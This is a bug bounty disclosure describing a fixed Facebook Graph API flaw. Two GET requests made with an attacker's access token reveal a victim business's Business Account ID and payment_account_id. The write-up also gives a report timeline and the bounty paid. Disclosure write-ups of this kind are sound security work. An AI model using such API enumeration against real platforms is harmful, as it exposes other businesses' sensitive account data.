Disclose Facebook Business Account ID

Using graph API field “business” on node type “application” to infer Business Account ID that was associated with the Facebook Application. However, the Business account is a public ID and Facebook doesn’t consider it is a privacy risk or security issue. But the bug also was valid as a malicious user can infer asset type app of the business account as vise versa. I was thinking about to report or not. Luckily I was able to infer one more filed “payment_account_id” which is a sensitive field. It was time to report the issue.

Proof of concept

Using attacker access_token it was possible to retrieve the data.

GET /v3.1/{application-id}/?fields=id,name,business
Host: graph.facebook.com

GET /v3.1/{business-id}/?fields=primary_page,payment_account_id
Host: graph.facebook.com

Poc Video:

Impact

This could have unintentionally let a malicious user disclose the Payment Account ID and Business Account ID of a victim business.

Timeline

• 18 Oct, 2018 – Initial Report Sent.
• 02 Nov, 2018 – Acknowledgment of Report.
• 20 Feb, 2019 – Issue Fixed.
• 03 May, 2019 – $1500 Bounty Awarded.